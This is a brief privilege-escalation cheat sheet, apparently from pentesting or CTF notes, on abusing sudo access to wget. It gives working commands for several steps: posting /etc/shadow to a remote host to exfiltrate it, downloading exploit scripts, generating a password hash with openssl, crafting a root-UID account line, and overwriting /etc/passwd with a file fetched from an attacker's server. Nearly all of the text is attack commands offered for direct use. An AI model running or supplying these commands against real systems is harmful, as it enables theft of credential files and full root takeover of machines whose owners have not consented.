- Situations where you have sudo privileges to run WGET
- Can use WGET to exfiltrate sensitive files
- Download exploits/scripts etc
sudo wget --post-file=/etc/shadow remoteIP:remotePort
wget https://filetodownload
- You could also overwrite /etc/passwd or shadow to include your own user
openssl passwd -1 -salt username password
- Copy the /etc/passwd file and add malicious user in with root UID
user:passwdhash:0:0:root:/root:/bin/bash
- Host new file and then use wget to download it
wget -O /etc/passwd http://malicous/passwd